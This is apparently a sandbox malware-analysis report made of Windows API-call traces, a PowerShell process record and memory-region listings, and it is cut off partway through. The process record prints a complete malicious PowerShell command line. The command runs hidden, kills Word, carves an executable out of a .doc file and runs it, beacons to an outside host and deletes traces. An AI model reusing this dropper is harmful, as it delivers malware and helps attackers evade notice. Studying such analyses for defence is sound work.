[0087.509] RegEnumValueW (in: hKey=0x530, dwIndex=0x1, lpValueName=0x2baf50, lpcchValueName=0x1c81d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="|5,", lpcchValueName=0x1c81d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0087.509] CoTaskMemFree (pv=0x2baf50)
[0087.515] RegQueryInfoKeyW (in: hKey=0x60c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81d03c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81d038, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81d03c*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81d038*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0087.515] CoTaskMemFree (pv=0x0)
[0087.515] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0087.515] RegEnumValueW (in: hKey=0x60c, dwIndex=0x0, lpValueName=0x2baf50, lpcchValueName=0x1c81d0e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="mq*", lpcchValueName=0x1c81d0e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0087.515] CoTaskMemFree (pv=0x2baf50)
[0087.515] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0087.515] RegEnumValueW (in: hKey=0x60c, dwIndex=0x1, lpValueName=0x2baf50, lpcchValueName=0x1c81d0e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="|5,", lpcchValueName=0x1c81d0e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0087.515] CoTaskMemFree (pv=0x2baf50)
[0087.515] RegQueryValueExW (in: hKey=0x60c, lpValueName="mq*", lpReserved=0x0, lpType=0x1c81d1cc, lpData=0x0, lpcbData=0x1c81d1c8*=0x0 | out: lpType=0x1c81d1cc*=0x3, lpData=0x0, lpcbData=0x1c81d1c8*=0x44) returned 0x0
[0087.515] RegQueryValueExW (in: hKey=0x60c, lpValueName="mq*", lpReserved=0x0, lpType=0x1c81d1cc, lpData=0x3105328, lpcbData=0x1c81d1c8*=0x44 | out: lpType=0x1c81d1cc*=0x3, lpData=0x3105328*, lpcbData=0x1c81d1c8*=0x44) returned 0x0
[0087.515] RegQueryValueExW (in: hKey=0x60c, lpValueName="|5,", lpReserved=0x0, lpType=0x1c81d1cc, lpData=0x0, lpcbData=0x1c81d1c8*=0x0 | out: lpType=0x1c81d1cc*=0x3, lpData=0x0, lpcbData=0x1c81d1c8*=0x44) returned 0x0
[0087.515] RegQueryValueExW (in: hKey=0x60c, lpValueName="|5,", lpReserved=0x0, lpType=0x1c81d1cc, lpData=0x3105d78, lpcbData=0x1c81d1c8*=0x44 | out: lpType=0x1c81d1cc*=0x3, lpData=0x3105d78*, lpcbData=0x1c81d1c8*=0x44) returned 0x0
[0087.522] RegQueryInfoKeyW (in: hKey=0x60c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81d05c*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81d058*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0087.522] CoTaskMemFree (pv=0x0)
[0087.522] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0087.522] RegEnumValueW (in: hKey=0x60c, dwIndex=0x0, lpValueName=0x2baf50, lpcchValueName=0x1c81d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="mq*", lpcchValueName=0x1c81d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0087.522] CoTaskMemFree (pv=0x2baf50)
[0087.522] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0087.522] RegEnumValueW (in: hKey=0x60c, dwIndex=0x1, lpValueName=0x2baf50, lpcchValueName=0x1c81d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="|5,", lpcchValueName=0x1c81d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0087.522] CoTaskMemFree (pv=0x2baf50)
[0087.523] _CxxThrowException ()
[0087.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81ab50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81aaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81aaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81aaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.681] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0087.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0087.681] CoTaskMemFree (pv=0x2569a0)
[0087.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d2b070, Length=0x20000, ResultLength=0x1c81e080 | out: SystemInformation=0x12d2b070, ResultLength=0x1c81e080*=0xe378) returned 0x0
[0087.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1c81dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0087.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1c81dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0087.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1c81dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0087.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1c81dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0087.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.919] OpenProcess (dwDesiredAccess=0x100400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x530
[0087.919] GetExitCodeProcess (in: hProcess=0x530, lpExitCode=0x1c81e2b8 | out: lpExitCode=0x1c81e2b8*=0x103) returned 1
[0087.919] GetCurrentProcess () returned 0xffffffffffffffff
[0087.919] GetCurrentProcess () returned 0xffffffffffffffff
[0087.919] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x530, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c81e208, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c81e208*=0x4fc) returned 1
[0087.919] GetCurrentProcessId () returned 0x2ac
[0087.919] GetCurrentProcessId () returned 0x2ac
[0087.919] OpenProcess (dwDesiredAccess=0x100400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x530
[0087.919] GetExitCodeProcess (in: hProcess=0x530, lpExitCode=0x1c81e308 | out: lpExitCode=0x1c81e308*=0x103) returned 1
[0087.919] GetCurrentProcess () returned 0xffffffffffffffff
[0087.919] GetCurrentProcess () returned 0xffffffffffffffff
[0087.919] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x530, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c81e258, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c81e258*=0x4fc) returned 1
[0087.920] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x2ac) returned 0x530
[0087.920] TerminateProcess (hProcess=0x530, uExitCode=0xffffffff)
Process:
id = "10"
image_name = "powershell.exe"
filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
page_root = "0x390dd000"
os_pid = "0x968"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x370"
cmd_line = "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}"
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1463
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1464
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1465
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1466
start_va = 0x50000
end_va = 0xcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1467
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1468
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1469
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1470
start_va = 0x13f630000
end_va = 0x13f6a6fff
entry_point = 0x13f63c63c
region_type = mapped_file
name = "powershell.exe"
filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")
Region:
id = 1471
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1472
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1473
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1474
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1527
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1528
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1529
start_va = 0xd0000
end_va = 0x136fff
entry_point = 0xd0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1530
start_va = 0x140000
end_va = 0x146fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 1531
start_va = 0x150000
end_va = 0x151fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 1532
start_va = 0x160000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 1533
start_va = 0x170000
end_va = 0x26ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1534
start_va = 0x270000
end_va = 0x272fff
entry_point = 0x270000
region_type = mapped_file
name = "powershell.exe.mui"
filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui")
Region:
id = 1535
start_va = 0x280000
end_va = 0x280fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 1536
start_va = 0x290000
end_va = 0x38ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1537
start_va = 0x390000
end_va = 0x517fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 1538
start_va = 0x520000
end_va = 0x6a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 1539
start_va = 0x6b0000
end_va = 0x1aaffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Region:
id = 1540
start_va = 0x1ab0000
end_va = 0x1ab0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ab0000"
filename = ""
Region:
id = 1541
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1542
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1543
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1544
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1545
start_va = 0x7fef1910000
end_va = 0x7fef197efff
entry_point = 0x7fef1911134
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 1546
start_va = 0x7fefbf10000
end_va = 0x7fefbf28fff
entry_point = 0x7fefbf111a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1547
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1548
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1549
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1550
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1551
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1552
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1553
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1554
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1555
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1556
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1557
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1558
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1559
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1565
start_va = 0x1ac0000
end_va = 0x1bbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ac0000"
filename = ""
Region:
id = 1566
start_va = 0x1c30000
end_va = 0x1c3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001c30000"
filename = ""
Region:
id = 1567
start_va = 0x1dd0000
end_va = 0x1e4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001dd0000"
filename = ""
Region:
id = 1568
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1637
start_va = 0x1bc0000
end_va = 0x1bc0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bc0000"
filename = ""
Region:
id = 1638
start_va = 0x1bd0000
end_va = 0x1bd0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bd0000"
filename = ""
Region:
id = 1639
start_va = 0x1be0000
end_va = 0x1be1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001be0000"
filename = ""
Region:
id = 1640
start_va = 0x1bf0000
end_va = 0x1bf0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bf0000"
filename = ""
Region:
id = 1641
start_va = 0x1c00000
end_va = 0x1c01fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c00000"
filename = ""
Region:
id = 1642
start_va = 0x1c10000
end_va = 0x1c13fff
entry_point = 0x1c10000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1643
start_va = 0x1c20000
end_va = 0x1c20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c20000"
filename = ""
Region:
id = 1644
start_va = 0x1c40000
end_va = 0x1d1efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c40000"
filename = ""
Region:
id = 1645
start_va = 0x1d20000
end_va = 0x1d3efff
entry_point = 0x1d20000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db")
Region:
id = 1646
start_va = 0x1d40000
end_va = 0x1dbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d40000"
filename = ""
Region:
id = 1647
start_va = 0x1dc0000
end_va = 0x1dc3fff
entry_point = 0x1dc0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1648
start_va = 0x1e50000
end_va = 0x1e7ffff
entry_point = 0x1e50000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db")
Region:
id = 1649
start_va = 0x1e80000
end_va = 0x1ee5fff
entry_point = 0x1e80000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1650
start_va = 0x1f10000
end_va = 0x1f8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f10000"
filename = ""
Region:
id = 1651
start_va = 0x2010000
end_va = 0x208ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002010000"
filename = ""
Region:
id = 1652
start_va = 0x2090000
end_va = 0x235efff
entry_point = 0x2090000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1653
start_va = 0x2360000
end_va = 0x2752fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002360000"
filename = ""
Region:
id = 1654
start_va = 0x2880000
end_va = 0x28fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 1655
start_va = 0x2960000
end_va = 0x29dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1656
start_va = 0x7fef6190000
end_va = 0x7fef619bfff
entry_point = 0x7fef6191380
region_type = mapped_file
name = "linkinfo.dll"
filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")
Region:
id = 1657
start_va = 0x7fef61a0000
end_va = 0x7fef61d3fff
